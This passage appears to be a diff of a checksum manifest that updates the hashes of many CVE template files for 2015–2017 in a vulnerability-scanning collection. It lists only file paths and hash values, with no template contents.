-http/cves/2015/CVE-2015-7377.yaml:d25293da9b608b3d5fe24401629e95ab2d40126f -http/cves/2015/CVE-2015-7450.yaml:8087b73d75c507bf18ed02e18b755d6660478f66 -http/cves/2015/CVE-2015-7780.yaml:73ed034475c5ba31e0573fa7a3514802457e2783 -http/cves/2015/CVE-2015-7823.yaml:3d67a98ba5cd00fd01606bf4d6b58c4a78944b15 -http/cves/2015/CVE-2015-8349.yaml:fe0f6e331350b97b7709795ba6ef141b817ed7c8 -http/cves/2015/CVE-2015-8399.yaml:c6ca2239de46e1d2ba8adf72fb02ebddadfbf4dd -http/cves/2015/CVE-2015-8813.yaml:cdd4013c11aa0453fd47fce733e457db3f6cf465 -http/cves/2015/CVE-2015-9312.yaml:5f42855311c44e71afcb95b22f70e3e742328bd4 -http/cves/2015/CVE-2015-9323.yaml:b87ef1b3c11cc88ebeac597a411b06deea79cd7c -http/cves/2015/CVE-2015-9414.yaml:a1f08f72a4dd4102f2c486f2060d281281754f96 -http/cves/2015/CVE-2015-9480.yaml:29c9ba4b0f47d79c934729c0e8b81731e08c52af -http/cves/2016/CVE-2016-0957.yaml:baa368e9c5d4c2e26291cdd2c2179d81c2882018 -http/cves/2016/CVE-2016-1000126.yaml:1d8fc40a1c74a1e8debf32054e23cb71017f7381 -http/cves/2016/CVE-2016-1000127.yaml:a722d367a8b46df1d3a1221f8345b071f2edf34e -http/cves/2016/CVE-2016-1000128.yaml:902456818e88ea6f618c238e6b4600121ffa7e9b -http/cves/2016/CVE-2016-1000129.yaml:d90c666f6e266d79b0da9bf66271461b00ab7423 -http/cves/2016/CVE-2016-1000130.yaml:58f8ae2618f832400218cf7ea11985a54437dc48 -http/cves/2016/CVE-2016-1000131.yaml:e4d747a8f2ba9295adc39d7b17bd9cfcba058d37 -http/cves/2016/CVE-2016-1000132.yaml:14d60b5e66ecd34ebf6e53e820e0158ce3dca853 -http/cves/2016/CVE-2016-1000133.yaml:da9641c2c755b1252e07bfeabe676e8a977f599e -http/cves/2016/CVE-2016-1000134.yaml:aefd71751714be477baf00c66cee77045c006aa6 -http/cves/2016/CVE-2016-1000135.yaml:078775a697caf7bc82ca5484f117e0eec1cf5c44 -http/cves/2016/CVE-2016-1000136.yaml:54b4bae91bf6436cb49c4970d29ef835562b3a48 -http/cves/2016/CVE-2016-1000137.yaml:eb56ab8cccec24a4f3c30f445f7554f303bd9b49 -http/cves/2016/CVE-2016-1000138.yaml:d9a44f4f2314c948305ae6735aadbb67d7467587 -http/cves/2016/CVE-2016-1000139.yaml:b7bfa05a4baa72b1dc64662c31951d09bcb7ab7b -http/cves/2016/CVE-2016-1000140.yaml:acdd4c0f71dc4003c4f028dec7e12a777a925b8a -http/cves/2016/CVE-2016-1000141.yaml:47580f75e6299e210b4b586f419609afaaa8c7b6 -http/cves/2016/CVE-2016-1000142.yaml:2ca40f5a202739d2e83c2537c4f8cb65b47f0853 -http/cves/2016/CVE-2016-1000143.yaml:18bc168f0450e35b8e5c047377814340637dcb3a -http/cves/2016/CVE-2016-1000146.yaml:7750e0b70f78b58aab9fd0d021248e1964fab091 -http/cves/2016/CVE-2016-1000148.yaml:4eb8f7a1d133d574986d317cc5009b044c5cf37b -http/cves/2016/CVE-2016-1000149.yaml:7eee52701e6fa81f23afd3672c9f56829db6e34a -http/cves/2016/CVE-2016-1000152.yaml:3fb1aa91e51eac2d1012861140dfea9b1a2d3ae0 -http/cves/2016/CVE-2016-1000153.yaml:a90a4448ba533f9a112aa260eb9ba2538c785ce5 -http/cves/2016/CVE-2016-1000154.yaml:43c59afddc541b80b8afe74f057e40b6cdbfaf86 -http/cves/2016/CVE-2016-1000155.yaml:7a33079b3f764d69d578df70e4ca3818ececb5a4 -http/cves/2016/CVE-2016-10033.yaml:ce389a81d193ae5606f09f85bae326743f720e3c -http/cves/2016/CVE-2016-10108.yaml:8e05b3f45b4ff23978e6c828ee42b1345cfb3789 -http/cves/2016/CVE-2016-10134.yaml:2fb772084500884a2945902a5b45f4acf12a1469 -http/cves/2016/CVE-2016-10367.yaml:52390032ca7ba46d211d738d7bdbbe8a44704b14 -http/cves/2016/CVE-2016-10368.yaml:026b2081b1e58241ed8e24c4770593be88f98300 -http/cves/2016/CVE-2016-10924.yaml:f03090931175a313574b1fdf30281872dcea36db -http/cves/2016/CVE-2016-10940.yaml:1e64fa8c00765b5d56dd9dc1108b0ce0c55882b6 -http/cves/2016/CVE-2016-10956.yaml:b7e533a71e3b87c50943a1e3adfb7b3204ebc78e -http/cves/2016/CVE-2016-10960.yaml:956604e8da462ea3d351c0d1b80fcf47d4378453 -http/cves/2016/CVE-2016-10973.yaml:d42e8746c96695687320b25c4f7c779d95219eae -http/cves/2016/CVE-2016-10993.yaml:17dbbe3f7dba8f86100124da83f97e0e69fc6fdf -http/cves/2016/CVE-2016-1555.yaml:90060af765793870bda5512a3a8def693ded296b -http/cves/2016/CVE-2016-2389.yaml:f367159a1bf528fe830583f445d7904ea1f755b4 +http/cves/2015/CVE-2015-7377.yaml:45073656f75b773440463d32f4a8c396179ff5de +http/cves/2015/CVE-2015-7450.yaml:85d20632825e80a9d4dc1f773d7466ad433ed8e9 +http/cves/2015/CVE-2015-7780.yaml:5defa47962f563d379b3c78ef0914237987dd534 +http/cves/2015/CVE-2015-7823.yaml:ff9af0652bef35a8af6f196705c656c0959058dd +http/cves/2015/CVE-2015-8349.yaml:ebbb1f6683a6a5e3d30f71a3c6e2cc8961f1a900 +http/cves/2015/CVE-2015-8399.yaml:0993b7ce788f00f919c16982f6a1c111fa151b71 +http/cves/2015/CVE-2015-8813.yaml:bac94c457ad47a84820b5dc872cca0e5dd614e80 +http/cves/2015/CVE-2015-9312.yaml:0d6234b0dffc42487593f660e13dc5e39745361f +http/cves/2015/CVE-2015-9323.yaml:0f077e61a6f27eda6f532e1997adfe300651450a +http/cves/2015/CVE-2015-9414.yaml:5fbd64bafafdebf2bf433024b531c66bca3afd29 +http/cves/2015/CVE-2015-9480.yaml:345fc540506800b5715d15a3ee3f73075bacf75c +http/cves/2016/CVE-2016-0957.yaml:851337886eafb077a8ecb721cbcb9529189c5508 +http/cves/2016/CVE-2016-1000126.yaml:a3f897e6b877349c7296d61fc7ae7e9495e06530 +http/cves/2016/CVE-2016-1000127.yaml:bf697816a699c429266b42e4225255353a00942a +http/cves/2016/CVE-2016-1000128.yaml:69a00f3bf2612059be957827d49a55bc24226ce4 +http/cves/2016/CVE-2016-1000129.yaml:e6be0c7da9e73c08a066cfd0cda9c053d2884689 +http/cves/2016/CVE-2016-1000130.yaml:41cfb88d851ba21e35c07937ad4a07d943b9cee6 +http/cves/2016/CVE-2016-1000131.yaml:5be3833be64a7b4b22410ed0d51765d6d314da81 +http/cves/2016/CVE-2016-1000132.yaml:33f5608d9994ac4ef974e394daf08cee94650676 +http/cves/2016/CVE-2016-1000133.yaml:f3b4d36df320913dfb2f76486de3775e848603c5 +http/cves/2016/CVE-2016-1000134.yaml:a572f312d400b7c8e607853e0f87e8e8f1c143e8 +http/cves/2016/CVE-2016-1000135.yaml:2be40889dcb75fcb7fe440d9c019cbc17b6e3ee2 +http/cves/2016/CVE-2016-1000136.yaml:d51b509f0bbdd49c98b8af2a793ad7558fde26cf +http/cves/2016/CVE-2016-1000137.yaml:5cd406afe96e3243860c86e67be1ece4b17dc216 +http/cves/2016/CVE-2016-1000138.yaml:95ef917b2c40a55017fc5de2e8a494e42bb28459 +http/cves/2016/CVE-2016-1000139.yaml:cfb9d9d6522ac1ad9a95eeefa987412a556bf025 +http/cves/2016/CVE-2016-1000140.yaml:b7c426ec830dd3823fb6d967eed564c4abb86fe5 +http/cves/2016/CVE-2016-1000141.yaml:0edb3a97db04d6a912a4361adb3c0793db46a7ee +http/cves/2016/CVE-2016-1000142.yaml:5b8084621866bc366c723a0f5d2e4719ac4d9a29 +http/cves/2016/CVE-2016-1000143.yaml:4f9993919c9eacb59887dc937f678722a0a3af25 +http/cves/2016/CVE-2016-1000146.yaml:de42c4981eeeabb25b58944654fa22ac981d6322 +http/cves/2016/CVE-2016-1000148.yaml:e87ff91c9a80c1b106ab4f07be9ec9da47eff459 +http/cves/2016/CVE-2016-1000149.yaml:373a2ee120d903dabe17037f6390dad6a7bf2fc3 +http/cves/2016/CVE-2016-1000152.yaml:b6ea5beee6f123e26f93b53666b9327a073c159c +http/cves/2016/CVE-2016-1000153.yaml:a9b8db23d7b1a04995610f7a954b0e380fcfa7b7 +http/cves/2016/CVE-2016-1000154.yaml:50a7df5358d2b3db6f49ea0e8bbd2cb67c5cde00 +http/cves/2016/CVE-2016-1000155.yaml:7d2741ba631bacda812ba87a17c2c090fb7bb2ee +http/cves/2016/CVE-2016-10033.yaml:ac9fb771ee53b4845e0a0690b56898ea60190e78 +http/cves/2016/CVE-2016-10108.yaml:6e7e2f829725e10c545698c65c14708f4276d98a +http/cves/2016/CVE-2016-10134.yaml:6b1ca6a61656ff231d33e825edaaa9a00a7c5039 +http/cves/2016/CVE-2016-10367.yaml:e6eecaca48020719190e9757d31eb60eaf9908f2 +http/cves/2016/CVE-2016-10368.yaml:6a139a9322b2bd819ac8e58b27294beab5c5e251 +http/cves/2016/CVE-2016-10924.yaml:5870a88f1733fc847eb09700f38baa2bb065989f +http/cves/2016/CVE-2016-10940.yaml:b300f1aef813b0ff492ddb3b392db93d695d4aa7 +http/cves/2016/CVE-2016-10956.yaml:4311c59f9c634cd610e3da493b1b9adf5ba64d27 +http/cves/2016/CVE-2016-10960.yaml:3398b5d7200de3cab2c882a6a2a306ca7b0ef581 +http/cves/2016/CVE-2016-10973.yaml:7590216f71a400af67410cb21138f0d7e825ccd9 +http/cves/2016/CVE-2016-10993.yaml:45c4221f4d2e0dc5c140360c594d93590b010a8f +http/cves/2016/CVE-2016-1555.yaml:d1143a5ad5f8a1eaf34b1897ad0bc3433ced2443 +http/cves/2016/CVE-2016-2389.yaml:5ce58ae1a1ab089913f6c391cdf8d72f1a5ebbb7 http/cves/2016/CVE-2016-3081.yaml:d133f7c9af4835ecdd688e05f1ef1946a0088be5 -http/cves/2016/CVE-2016-3088.yaml:b7399b26d3280601caead3164f24b2fc71f023f8 -http/cves/2016/CVE-2016-3978.yaml:5295d51cf77946c3001485d451f6de6b5497511f -http/cves/2016/CVE-2016-4437.yaml:bfca753826c3be353a5b1087b4320168d93ed46d -http/cves/2016/CVE-2016-4975.yaml:d270f01af10eccb0125ee30fad7d4d5f7e8e56fc -http/cves/2016/CVE-2016-4977.yaml:fc2b081c457f89a4628c5d3d40880aa4ee9d45be -http/cves/2016/CVE-2016-5649.yaml:826dfaac1a87bd88f97e6679a1e811b576589766 -http/cves/2016/CVE-2016-6195.yaml:c7a579387429eb9598d38773c72286331cd78afa -http/cves/2016/CVE-2016-6277.yaml:50532a32961200b9c633f12dc665c4b1ee0fd3a5 -http/cves/2016/CVE-2016-6601.yaml:c67636f6ae2eea5fad655db8a0a7663c4a6bc87f -http/cves/2016/CVE-2016-7552.yaml:60b3a588a85f786ec494b79874deb22e1372e1e9 -http/cves/2016/CVE-2016-7834.yaml:fc9c0000623a298c19f9578b0e9bfc9eadec94db -http/cves/2016/CVE-2016-7981.yaml:f42c4671f7471274f6eca1f56464f186c79fce65 -http/cves/2016/CVE-2016-8527.yaml:7b31778c21b4f73753a070729238762ebfe4f450 -http/cves/2017/CVE-2017-0929.yaml:16e7ee0d0272d2ef01af074639dadab7404f0df5 -http/cves/2017/CVE-2017-1000028.yaml:addf4de111ca65284519feeba0cd08a777a88cca -http/cves/2017/CVE-2017-1000029.yaml:e022b4774e2b0c7c0d4f793c7a786569f0bf2b66 -http/cves/2017/CVE-2017-1000163.yaml:6f5ce549a4ff1dd2ddf99b2aab9fd1fbe5beb8d1 -http/cves/2017/CVE-2017-1000170.yaml:2bc3aa517030eaec2083844d61fd5896021ad745 -http/cves/2017/CVE-2017-1000486.yaml:bd6f50c93df7c731576a446bbe1122837829829d -http/cves/2017/CVE-2017-10075.yaml:b7e02797203edafec35cc3693465ef912f3f97ef -http/cves/2017/CVE-2017-10271.yaml:34ae073c068af54b5a36058ab4b33b2cb26f81c3 -http/cves/2017/CVE-2017-10974.yaml:ca4dc42ec03c7f7c66b8c4d60e78dbdde0a44fce -http/cves/2017/CVE-2017-11165.yaml:90c54a0f297c4a2fb3adab12ed0e28eb5a1f92d3 -http/cves/2017/CVE-2017-11444.yaml:b1f8928100d2bc5feaf46dc2b2c3357c93f00efe -http/cves/2017/CVE-2017-11512.yaml:9427313cd620eec43c9a1189d1e4632b4369a663 -http/cves/2017/CVE-2017-11586.yaml:90eb78983757473424d56564157cb16abd039190 -http/cves/2017/CVE-2017-11610.yaml:c3b11ddd3a65d122ecff0570d1eb7f1b993f558c -http/cves/2017/CVE-2017-11629.yaml:8789ac3137929552b1bc172c0a1810705addb918 -http/cves/2017/CVE-2017-12138.yaml:b117857513b1a8a105fa82a6f7e92ac72c75ea7a -http/cves/2017/CVE-2017-12149.yaml:7e93b96b9c9f6044ff50cc3d0d1bc5a16d420fd7 -http/cves/2017/CVE-2017-12542.yaml:521243c6133c562495efc5495230d13081915afe -http/cves/2017/CVE-2017-12544.yaml:6c99779fb8dcadd52ab60f73ccb6bfe310c6aa1e -http/cves/2017/CVE-2017-12583.yaml:133d14ad9275795f59885083278d724da5706ead -http/cves/2017/CVE-2017-12611.yaml:b44f1901610fa7b3f56d9c5e5e9156ba9d95c796 -http/cves/2017/CVE-2017-12615.yaml:1332d54ec2ef3ba1f2291d10f6539e39029e9577 -http/cves/2017/CVE-2017-12617.yaml:4d340a752fd7fdd0ef5921fed89bb60f7862e9c2 -http/cves/2017/CVE-2017-12629.yaml:2e1e0070e8f9c9975074dab417e3d372a4ae129f -http/cves/2017/CVE-2017-12635.yaml:3f9686e7f11bab3f90dbdeeaec50807fefca3abf -http/cves/2017/CVE-2017-12637.yaml:cd9f2e3bdf4267d094d35b4635cbed2c56d7e931 -http/cves/2017/CVE-2017-12794.yaml:933238a17426e60810dad692721329ae8abfbc64 -http/cves/2017/CVE-2017-14135.yaml:6092ffcd022c2d0d5cfcced451720551ba16e16d -http/cves/2017/CVE-2017-14186.yaml:1c030cfb21477c4a9242e4c0f399fd5dba3a9f29 -http/cves/2017/CVE-2017-14524.yaml:824f850ca133d084d25d4c5062a46f29e4e19ea2 -http/cves/2017/CVE-2017-14535.yaml:0e6677e4e25a8ede3953463e279cd29b93b88d18 -http/cves/2017/CVE-2017-14537.yaml:46d453360ab26dadb8341a783b1a95f22e22c2c7 -http/cves/2017/CVE-2017-14622.yaml:16bef73f45d813365fb6be8872548f93c2894fc2 -http/cves/2017/CVE-2017-14651.yaml:47d07ae099cb9a9c4d16a5d52ac68605bbe35baa -http/cves/2017/CVE-2017-14849.yaml:5612bf559b38e4de5d868f91387dd3166fc0a4f7 -http/cves/2017/CVE-2017-15287.yaml:7a439e70a368485ab3215511c29cc69e5262cf52 -http/cves/2017/CVE-2017-15363.yaml:42605d1a13d93a676a78c85ab8120b63441b27aa -http/cves/2017/CVE-2017-15647.yaml:c0dda374975ec19276b75ea665910ba3d4407d47 -http/cves/2017/CVE-2017-15715.yaml:135efc926e9b5f3716c0e725559568ce41361544 -http/cves/2017/CVE-2017-15944.yaml:eb9694b6d32e7f99664c6d6b28f715a89987d8a5 -http/cves/2017/CVE-2017-16806.yaml:90584af1d01d5616cd9618c6047a8e0769eae041 -http/cves/2017/CVE-2017-16877.yaml:addce598ad69a0d4008f784be6e7bd8113b5b201 -http/cves/2017/CVE-2017-16894.yaml:aaabdfbb2745a4d999a076e77029ec3c761f04d1 -http/cves/2017/CVE-2017-17043.yaml:080876e2e09601e1954808b7d285a5232065aac0 -http/cves/2017/CVE-2017-17059.yaml:99c16a07bc096eb125d2427ff1eb067bf51a968c -http/cves/2017/CVE-2017-17451.yaml:889a4a102c4b858c02c356364f33794cd3aa0073 -http/cves/2017/CVE-2017-17562.yaml:38f9bdfd5be24b216e3e0b2054f909824c69b774 -http/cves/2017/CVE-2017-17731.yaml:f25ec6cb1204e6b5de43646d2fd84809b0cc61e2 -http/cves/2017/CVE-2017-17736.yaml:2d6f119a1a86243ed5e9e164425f8de8fb854034 -http/cves/2017/CVE-2017-18024.yaml:bc4cf14eff98b256da35e7d174c800540ca29380 -http/cves/2017/CVE-2017-18487.yaml:d5c0aa22d568420adad65fa392e08502fffabd92 -http/cves/2017/CVE-2017-18490.yaml:0221914fc2ffec5831ebe094f916df822a89cf11 -http/cves/2017/CVE-2017-18491.yaml:3663189b01ffb0919a26a597af6328db337327d2 -http/cves/2017/CVE-2017-18492.yaml:9041e80262130baa31f765b8d445578b9229d552 -http/cves/2017/CVE-2017-18493.yaml:c29ad0f7ba854ffab922a273795e0ada9f19426c -http/cves/2017/CVE-2017-18494.yaml:2bd1d182deb24629a25966bd8ecb7f839744a2b2 -http/cves/2017/CVE-2017-18496.yaml:5ef202523925d9a6844e7ab7a04ef18032b54819 -http/cves/2017/CVE-2017-18500.yaml:a7f9a836d3bea7b821799d83e1aa10f738df8c03 -http/cves/2017/CVE-2017-18501.yaml:196a39b4d72f019562aa0ce7def2fedadc4a1853 -http/cves/2017/CVE-2017-18502.yaml:81311753b9594c742aec071e9e62936b021fefb2 -http/cves/2017/CVE-2017-18505.yaml:fa107f6b333a70ae7e7f9a6021b9f05782ae8cc5 -http/cves/2017/CVE-2017-18516.yaml:6b13007c804a258889f44e717465aa8b095a541d -http/cves/2017/CVE-2017-18517.yaml:6e297fef74c651aba69cc68cccb87d138f38aa47 -http/cves/2017/CVE-2017-18518.yaml:667844cd22bc01a28a5b8e9bb02be3377d2650c7 -http/cves/2017/CVE-2017-18527.yaml:9d1f0cf75a58b885271769ad4ea5ce114e897d43 -http/cves/2017/CVE-2017-18528.yaml:2b89079dfbf2eb428aa077f713eeff8e64360c85 -http/cves/2017/CVE-2017-18529.yaml:4c4cea7e1166de29d284b7e195491f5f1173a6b4 -http/cves/2017/CVE-2017-18530.yaml:b1da3d833a670a1176a74fd8716e9112368f42fc -http/cves/2017/CVE-2017-18532.yaml:0a0a7d7520bb34a6bdbe6a452e8915d6d9f16a5e -http/cves/2017/CVE-2017-18536.yaml:2c498e0c59f3e3d23e5b5341880778e8d1481f80 -http/cves/2017/CVE-2017-18537.yaml:5bffb4d2e90a96ec9e4e91431ba71332615e3673 -http/cves/2017/CVE-2017-18542.yaml:0050f03f9faa1d89487c9cea261352b94a2cf3a8 -http/cves/2017/CVE-2017-18556.yaml:08def75decdaf3dc219fa97c9f3f3d47427f22f0 -http/cves/2017/CVE-2017-18557.yaml:787270e9cb092efaf8a298064aaa20ca0d62999b -http/cves/2017/CVE-2017-18558.yaml:a6ae83ec6821eb28f3bc57f7e999a1d9cdc0cedb -http/cves/2017/CVE-2017-18562.yaml:6014d4fbd556e07de43c172dc06f9c1bd4f30c72 -http/cves/2017/CVE-2017-18564.yaml:bd679da1043bb5050f5677967c8e3db902da5abd -http/cves/2017/CVE-2017-18565.yaml:4f158d19f0491ee33a5c35624ef72dd816928fd4 -http/cves/2017/CVE-2017-18566.yaml:b215201dce89fcb15e006f76f8278817f649f50f -http/cves/2017/CVE-2017-18598.yaml:68b5cc0afb4d260b3164638ee7181ebede8e2507 -http/cves/2017/CVE-2017-18638.yaml:ae5d0872287fb7ec58754fa14830f0d2803d92f3 -http/cves/2017/CVE-2017-3506.yaml:9d3599b94152fc9b8a1ffaf810264bf772738764 -http/cves/2017/CVE-2017-3528.yaml:fd44a46c473aa25189e4931866077623ab805d27 -http/cves/2017/CVE-2017-4011.yaml:c2055a0b4455bdbcaa8c6a0965b08cd82694ac70 -http/cves/2017/CVE-2017-5487.yaml:605ec4b4ddc32eee7baa5ed9319b7ef5ffd98252 -http/cves/2017/CVE-2017-5521.yaml:18d74e9795ab5d67a40cc30f0a008f94b6ea117a -http/cves/2017/CVE-2017-5631.yaml:3103eb8b159934bc676c96f4af86c083732dc810 -http/cves/2017/CVE-2017-5638.yaml:b6dfe6408013f6f734706021d177afb3a0e7afa1 -http/cves/2017/CVE-2017-5689.yaml:8fb11dc5e6b7650ed033c8840ac22a9965a26114 -http/cves/2017/CVE-2017-5982.yaml:596cdae3d6abba62e2dd8c2dfe10114c0ce56ad9 -http/cves/2017/CVE-2017-6090.yaml:45a0f06649e86cd28710f7a79b9512c7642fefb0 -http/cves/2017/CVE-2017-7269.yaml:21016251e3fe09f17745c4920b2ca37aa383ce07 -http/cves/2017/CVE-2017-7391.yaml:b227f18479bdb0b320beb1fc4bbedcbdc8bce64b -http/cves/2017/CVE-2017-7615.yaml:edf884839d607c5187bddbf26aca5f83042a64f6 -http/cves/2017/CVE-2017-7855.yaml:921a27e99bdf90e82ba762ea67e03013bd680fd9 -http/cves/2017/CVE-2017-7921.yaml:f4b6e6e18d4e5310d71a4b2cff5f528c3a272ceb -http/cves/2017/CVE-2017-7925.yaml:1f16557d4b714ea699c07b2fae69543d0ba90288 -http/cves/2017/CVE-2017-8229.yaml:2175f405c52808e4885c3e4baeeabea9cf695cf2 -http/cves/2017/CVE-2017-8917.yaml:26524c88e6d8f020e290de981c9b6eb6d167f447 -http/cves/2017/CVE-2017-9140.yaml:f38ba17fe17ef8abd880114ca499d6848e5d48f8 -http/cves/2017/CVE-2017-9288.yaml:370ac7fc45be6f1061b19342793553837edaa558 -http/cves/2017/CVE-2017-9416.yaml:72e6324978dad59f214b7096b943be4e3bbcb39f -http/cves/2017/CVE-2017-9506.yaml:a24cfd5392d72d75bf3f85f83afe139cc4d952f8 -http/cves/2017/CVE-2017-9791.yaml:425fc309026a0b2a1ceb8afcd85c9537a3a474f6 -http/cves/2017/CVE-2017-9805.yaml:360a3febbe55d3986b51f8ede5fa1e8adc7c6229 -http/cves/2017/CVE-2017-9822.yaml:784cdb2db7a761784de85d86c2417e9129ba484f -http/cves/2017/CVE-2017-9833.yaml:7b1f6312a66eb7dcbac8d646279a61bc6dd78765 -http/cves/2017/CVE-2017-9841.yaml:6b8ba0aed99138add659d619aff7f089bb6ea4a4 -http/cves/2018/CVE-2018-0127.yaml:62e796b970d653fa701bf1e66bd11a54afa8567c -http/cves/2018/CVE-2018-0296.yaml:4575b71c06d951d36065ed94d6e9dd601f9799d8 -http/cves/2018/CVE-2018-1000129.yaml:2db06e2d02aadfb418f75869b27558066bde0547 -http/cves/2018/CVE-2018-1000130.yaml:7b47c2ea352df9bcee48e37797a5701a39a8d23b -http/cves/2018/CVE-2018-1000226.yaml:b6d11f2f913ecebc7473632c7df8b83c226b09fb -http/cves/2018/CVE-2018-1000533.yaml:a69046c6d821c68ed1189b1c726bede63634e971 -http/cves/2018/CVE-2018-1000600.yaml:b10e9ec0d01d002b85bacca57b85749a60ab8286 -http/cves/2018/CVE-2018-1000671.yaml:bd29670959a34423aeb1d87fa9d64a2fb38072eb -http/cves/2018/CVE-2018-1000856.yaml:3848bcf92929711bc0e629c8f8bf556d4337deff -http/cves/2018/CVE-2018-1000861.yaml:f0f7b99688663f92e55da84d62082f8a583e6ccf -http/cves/2018/CVE-2018-10093.yaml:7f093c040d69a7aa82eba0738408391a640ae757 -http/cves/2018/CVE-2018-10095.yaml:f3e8d5c1c21b28450bd4713a3331026761fea089 -http/cves/2018/CVE-2018-10141.yaml:6ae82fbc1d60e822b65ada2bf279353d9b1f1549 -http/cves/2018/CVE-2018-10201.yaml:97c9c2ee081b7da0350f3886cdc5ad2521bb9dd3 -http/cves/2018/CVE-2018-10230.yaml:f6fb3c897eaedaaed9cf7a74693b57bfde6cc27a -http/cves/2018/CVE-2018-10562.yaml:8170b4cf6f45b7a0e88dae31969423ceb300a933 +http/cves/2016/CVE-2016-3088.yaml:a4dc66f8086a5a7ee17d53a2275b321b566455ff +http/cves/2016/CVE-2016-3978.yaml:a36a0041d37dc3fdef154150880a4cd3997ca055 +http/cves/2016/CVE-2016-4437.yaml:cbc0fd80265dbeae9f144c58c5d2ae424734e632 +http/cves/2016/CVE-2016-4975.yaml:f8ca13905601962c14ec3f657d65e49f47e4ecb0 +http/cves/2016/CVE-2016-4977.yaml:caa5476b3ca9b086f8262115cb0b288fda16e399 +http/cves/2016/CVE-2016-5649.yaml:e95c51a713ef3f3df043a24c983436928c960ac1 +http/cves/2016/CVE-2016-6195.yaml:5eff82f03657d7248cfa461234f5a186f660d835 +http/cves/2016/CVE-2016-6277.yaml:64ed3a4b3ba1aab2d94dcb594d83d1298c7acb36 +http/cves/2016/CVE-2016-6601.yaml:e7f298e936aa94874957788de367717767d7e0e1 +http/cves/2016/CVE-2016-7552.yaml:090e3857c1f5d89b5f1ec3d2f2715b078bdcda75 +http/cves/2016/CVE-2016-7834.yaml:ef8ce31c9e0d357515e0fb972c0e60bc92dfe029 +http/cves/2016/CVE-2016-7981.yaml:889cecca4c66a2e00a1ada03262e7e819b1f9fa0 +http/cves/2016/CVE-2016-8527.yaml:becf6b4cdca66eeeaf00235b2281fe9094ccb9cf +http/cves/2017/CVE-2017-0929.yaml:9241cb8bd91bea344d66e012ca56b6b75f105b9b +http/cves/2017/CVE-2017-1000028.yaml:fa8067a5a433960ce2572e4a7f47d186fec0203e +http/cves/2017/CVE-2017-1000029.yaml:266f9b243585e7f63d07592e97d4e0a582288d09 +http/cves/2017/CVE-2017-1000163.yaml:3bcc36f5dc76468d5abc3a6eed7702c884f0ba9f +http/cves/2017/CVE-2017-1000170.yaml:bf87fe465dbbf260fe520ee4fdaf8ab604ccbba2 +http/cves/2017/CVE-2017-1000486.yaml:627ff2017fbb99f4b5ecdb860a2e31012bbac3b3 +http/cves/2017/CVE-2017-10075.yaml:7d724566af4b4ee36f7b8b21c5eda03f7e0c2b18 +http/cves/2017/CVE-2017-10271.yaml:114bd0ab3b2344a4464b34d74eb2a851e24bcf4d +http/cves/2017/CVE-2017-10974.yaml:46d7cdd8cce7011b9ec962c36c66d0bf6fd9338a +http/cves/2017/CVE-2017-11165.yaml:3a49a232524594887d96805e999691c01429681c +http/cves/2017/CVE-2017-11444.yaml:73a5f6e4f5abf494c404c83540943462ef17275d +http/cves/2017/CVE-2017-11512.yaml:fa6381ca5143d1f89fd5d208038bc0f8fd20275c +http/cves/2017/CVE-2017-11586.yaml:4f05a0a5578a703851573467f62989c6e952ae63 +http/cves/2017/CVE-2017-11610.yaml:24f3272bdf57e9f5f197b631383c979050ed18cb +http/cves/2017/CVE-2017-11629.yaml:b079d487f7c5dbdb5dbcdd9dec8f02a660903e74 +http/cves/2017/CVE-2017-12138.yaml:9acbfed9cc62e59685981077fbc749acf9875b64 +http/cves/2017/CVE-2017-12149.yaml:994598168bd1382835bea583c15554a0ec7b49d4 +http/cves/2017/CVE-2017-12542.yaml:be8789ab105749c2b8f7f07512dce2de2167ce80 +http/cves/2017/CVE-2017-12544.yaml:0aee7ed9e0da9945c5ee32a8ad549f01a407ac4b +http/cves/2017/CVE-2017-12583.yaml:c09d663be44778dcb350ba0f3b52d4e91c6b3fce +http/cves/2017/CVE-2017-12611.yaml:9110769804a047f753b7a740396ff5f22e96b199 +http/cves/2017/CVE-2017-12615.yaml:cc529b5dcc25ad73b4985ce8b325b9b555898c78 +http/cves/2017/CVE-2017-12617.yaml:49134828cbf9fd6649aa8e8de635a51e25e5a97e +http/cves/2017/CVE-2017-12629.yaml:7b4615286aa4331069d047e0d3878d8519e173ed +http/cves/2017/CVE-2017-12635.yaml:ce56324c35ca101943805782373fa2a1a0c69b53 +http/cves/2017/CVE-2017-12637.yaml:425ad12ea886647f34b19922894018a4a6bd3d30 +http/cves/2017/CVE-2017-12794.yaml:64946ed82e997503d8a491a9766ed6c60428ae8e +http/cves/2017/CVE-2017-14135.yaml:a109bf71484c3db1851d3931ad46d4e70ea01f40 +http/cves/2017/CVE-2017-14186.yaml:5b50c00a3ae98a13fa9b80d827c26cea43b929b6 +http/cves/2017/CVE-2017-14524.yaml:aee96c1da5e64923774c618f924e2f2754d26057 +http/cves/2017/CVE-2017-14535.yaml:44c6b3a19a418165c64c1ebb5fe44a350e30cafb +http/cves/2017/CVE-2017-14537.yaml:74287204c743521b3bdc223d45d95edec495a87f +http/cves/2017/CVE-2017-14622.yaml:5798ba568e154fd77351efa99c60ae747aa0310b +http/cves/2017/CVE-2017-14651.yaml:16baccb12be7c08ba62dfaaabdb4ae4f51e75edd +http/cves/2017/CVE-2017-14849.yaml:c4a0f34b1987fd0f2d668567eeb226d83f00d3aa +http/cves/2017/CVE-2017-15287.yaml:4af31898328ba4d29da1b0616af911752352b508 +http/cves/2017/CVE-2017-15363.yaml:0e347b02dea11f5742ee446a4db518efa3cea3dc +http/cves/2017/CVE-2017-15647.yaml:91675388be9a6da7497f9dc8dea38f257aab91f9 +http/cves/2017/CVE-2017-15715.yaml:7d7b675badb94155f4120708d121aa3e2286dbb3 +http/cves/2017/CVE-2017-15944.yaml:688c0f4caeeeff9df923a42035a005619aa37549 +http/cves/2017/CVE-2017-16806.yaml:25d838b2eca90b2c8b1a4178322d868fa13f7299 +http/cves/2017/CVE-2017-16877.yaml:633b565c25eb7bb0a1ca28c26c689e6ed493228f +http/cves/2017/CVE-2017-16894.yaml:99ab963d8dd95fb74a418f3ea146f117421faa95 +http/cves/2017/CVE-2017-17043.yaml:74d52f8c146b7ad41d704509e51f584587a0cc4a +http/cves/2017/CVE-2017-17059.yaml:5cb1ce01239709ee218521079d0b2e4eb30d84c4 +http/cves/2017/CVE-2017-17451.yaml:fa6dc0baf9ad951a005f8040d6ceaae8545412fd +http/cves/2017/CVE-2017-17562.yaml:ab4bc61466335d18b54101fc0c8375f5c6a7fabb +http/cves/2017/CVE-2017-17731.yaml:c46da78babf85bfaab44b391a5dfe3910a0448ae +http/cves/2017/CVE-2017-17736.yaml:b76134b565b11b06d4e75794268a81081645a2c6 